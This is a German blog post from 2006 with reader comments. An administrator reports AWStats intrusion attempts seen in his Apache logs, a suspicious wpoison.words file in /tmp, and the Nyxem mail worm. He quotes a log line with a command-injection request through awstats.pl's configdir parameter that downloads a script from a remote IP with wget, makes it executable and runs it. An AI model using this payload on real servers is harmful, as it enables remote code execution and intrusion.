Tuesday, 24. January 2006
AWStats immernoch im Kreuzfeuer
Das durch diverse Sicherheitslücken negativ aufgefallene AWStats scheint für diverse Hackversuche immernoch ein sehr beliebtes Einfalltor zu sein. AWStats ist ein grafisches Auswertungstool für Webserver-Logfiles, geschrieben in Perl. Ich selbst habe es ergänzend zu Webdruid/Webalizer im Einsatz.
So habe ich bei Stichproben in den Apachelogs von heute bereits diverse Einbruchsversuche bemerkt:
Die Quell-IP bleibt gleich (diesmal waren es wohl die bösen Polen), die getesteten Domains hingegen sind immer andere. Sehr merkwürdig das Ganze. Ebenfalls merkwürdig ist die Datei wpoison.words, die ich in /tmp gefunden habe. Keine Ahnung, ob das vielleicht eine Passwortliste oder sowas für Bruteforce sein soll? Mir sagen die Begriffe darin zumindest nichts, wohl aber der Dateiname. Zumindest ist mir dieser schön öfter negativ auf Serversystemen aufgefallen. Vielleicht weiss ja jemand Rat?
Mit einer gewissen Sorge schaue ich ebenfalls auf den neuen Mailwurm Nyxem (was soll das sein, ein "Nyxem"?
) bzw. auf die Mailqueue, die seit gestern auf rund 6000 Mails pro Knoten gestiegen ist. Das ist nicht weiter viel, aber viel wird da ja vielleicht noch kommen. Unsere Virenscanner bereiten sich aber bereits auf einen harten Kampf vor
So habe ich bei Stichproben in den Apachelogs von heute bereits diverse Einbruchsversuche bemerkt:
:~ # grep "wget" /usr/local/apache/logs/httpsd_24_01_2006.log
www.*.de 80.55.2.210 - - [24/Jan/2006:03:03:18 +0100] "GET awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget
%20194%2e102%2e194%2e115%2fscripz%3b
chmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
www.* 80.55.2.210 - - [24/Jan/2006:03:03:26 +0100] "GET
...
Die Quell-IP bleibt gleich (diesmal waren es wohl die bösen Polen), die getesteten Domains hingegen sind immer andere. Sehr merkwürdig das Ganze. Ebenfalls merkwürdig ist die Datei wpoison.words, die ich in /tmp gefunden habe. Keine Ahnung, ob das vielleicht eine Passwortliste oder sowas für Bruteforce sein soll? Mir sagen die Begriffe darin zumindest nichts, wohl aber der Dateiname. Zumindest ist mir dieser schön öfter negativ auf Serversystemen aufgefallen. Vielleicht weiss ja jemand Rat?
Mit einer gewissen Sorge schaue ich ebenfalls auf den neuen Mailwurm Nyxem (was soll das sein, ein "Nyxem"?
) bzw. auf die Mailqueue, die seit gestern auf rund 6000 Mails pro Knoten gestiegen ist. Das ist nicht weiter viel, aber viel wird da ja vielleicht noch kommen. Unsere Virenscanner bereiten sich aber bereits auf einen harten Kampf vor
Kommentare
Ansicht der Kommentare:
(Linear | Verschachtelt)
Hi,
auch auf meinen Systemen findet sich in den Logs diese Aufrufe, allerdings nicht die besagte Datei in /tmp. Wie kann diese dort überhaupt hingelangen? Über die AwStats-Aufrufe doch wohl kaum, oder?
auch auf meinen Systemen findet sich in den Logs diese Aufrufe, allerdings nicht die besagte Datei in /tmp. Wie kann diese dort überhaupt hingelangen? Über die AwStats-Aufrufe doch wohl kaum, oder?
Die kann z.B. schon über AWStats kommen, sofern sie via wget nachgeladen wurde. Oder durch einen beliebigen User des Systems, durch PHP-Scripte usw.! Gibt leider sehr viele Möglichkeiten. Ein Workaround ist auch, wget mit Chmod 0700 zu versehen, sofern Du es eh nur als root nutzt ...
Rob
Rob
> Vielleicht weiss ja jemand Rat?
http://www.monkeys.com/wpoison/
wpoison.pl: my $tmp_words_file = "/tmp/wpoison.words";
http://www.monkeys.com/wpoison/
wpoison.pl: my $tmp_words_file = "/tmp/wpoison.words";
Mh allerdings wird in diesem Fall wahrscheinlich die Wortliste eher verwendet, um an $string@provdider zu versenden, i.d.R. AOL usw. wenn ich das richtig sehe ...
Rob
Rob
Sehr interessant, denn mir waren derartige Lücken in Awstats bisher nicht bekannt. Werde mal rein interessehalber meine Logs nach derartigen Requests durchsuchen. Aber kein wirklicher Grund zur Sorge - wir nutzen ja schließlich alle eine Authentifikation per .htaccess. Oder nicht...?
Ja, tun wir i.d.R.
Aber beachte bitte, dass das Posting doch schon ein paar Tage alt ist und die Löcher in der aktuellen Version sicher gefixt sind. Ich persönlich benutze AWstats schon länger nicht mehr, eig. nur noch WebDruid und/oder Google-Analytics (jaja, ich weiss .. )
Aber beachte bitte, dass das Posting doch schon ein paar Tage alt ist und die Löcher in der aktuellen Version sicher gefixt sind. Ich persönlich benutze AWstats schon länger nicht mehr, eig. nur noch WebDruid und/oder Google-Analytics (jaja, ich weiss .. )
Ups! Da hab ich ja tatsächlich etwas uraltes ausgegraben ohne es zu bemerken. Ich sollte vielleicht schlafen, sowas ist mir ja noch nie passiert 
Das kenn ich leider nur zu gut. Aber bei dir wird ja immerhin schon fleißig geschrieben. Bei mir scheinen nicht mal nofollow Links dazu anzuregen
Gruß zurück,
Thorsten
Gruß zurück,
Thorsten
Hehe, und das obwohl ich Deinen Artikel darüber vor wenigen Minuten erst gelesen hab
Aber Du hast Recht, nur die wenigsten Besucher/Leser posten tatsächlich mal nen Comment ... schade eigentlich!
Aber Du hast Recht, nur die wenigsten Besucher/Leser posten tatsächlich mal nen Comment ... schade eigentlich!
@Rob
Ich finde es gut. Sonst würde man überall hunderte Beiträge finden, die teilweise unerheblich für diesen Artikel ist.
Ich finde es gut. Sonst würde man überall hunderte Beiträge finden, die teilweise unerheblich für diesen Artikel ist.
Suche
Kommentare
zu iTunes bald ohne DRM - und die anderen Probleme bleiben?
07.01.2009 09:58
Hi Frank
Ja keine Ahnung
, so unterschiedlich sind OSX
und Linux eigentlich nicht wir
klich.
Wahrscheinlich [...]
07.01.2009 09:58
Hi Frank
Ja keine Ahnung
, so unterschiedlich sind OSX
und Linux eigentlich nicht wir
klich.
Wahrscheinlich [...] zu iTunes bald ohne DRM - und die anderen Probleme bleiben?
07.01.2009 09:50
Ich versteh auch nicht warum d ie nicht endlich mal ein iTune s für Linux rausbringen. Unter MacOS X läuft der Mist [...]
07.01.2009 09:50
Ich versteh auch nicht warum d ie nicht endlich mal ein iTune s für Linux rausbringen. Unter MacOS X läuft der Mist [...]
zu 1984 aka 2009
03.01.2009 19:53
Exakt. ISP's, viele große Unte rnehmen oder auch Einrichtunge n der öffentlichen Verwaltung. Dieser Kundenkreis war [...]
03.01.2009 19:53
Exakt. ISP's, viele große Unte rnehmen oder auch Einrichtunge n der öffentlichen Verwaltung. Dieser Kundenkreis war [...]
zu 1984 aka 2009
03.01.2009 19:36
Du meinst weil BT überwiegend ISP's als Kunden hat, also z.B . Webhoster usw, die ja selbst diese Daten schon erfas [...]
03.01.2009 19:36
Du meinst weil BT überwiegend ISP's als Kunden hat, also z.B . Webhoster usw, die ja selbst diese Daten schon erfas [...]
zu 1984 aka 2009
03.01.2009 19:27
"Warum sollte das dann nicht a uch für andere Carrier, Provid er, Hoster etc. gelten?" We il BT einen sehr speziel [...]
03.01.2009 19:27
"Warum sollte das dann nicht a uch für andere Carrier, Provid er, Hoster etc. gelten?" We il BT einen sehr speziel [...]
Gut das auf meinem Server kein AWStats installiert ist. Denn so wie das ausschaut, ist noch immer ein Einbruch möglich, sofern AWStats auf dem Server installiert ist. IM Adminblog hab ich dazu eben einen Beitrag entdeckt. Hatte auch früher schon in v...
Aufgenommen: Jan 24, 10:59